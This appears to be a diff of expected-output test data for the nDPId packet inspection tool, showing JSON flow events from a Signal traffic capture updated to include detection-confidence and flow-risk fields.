CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00593{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Signal","breed":"Fun","category":"Chat"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}}
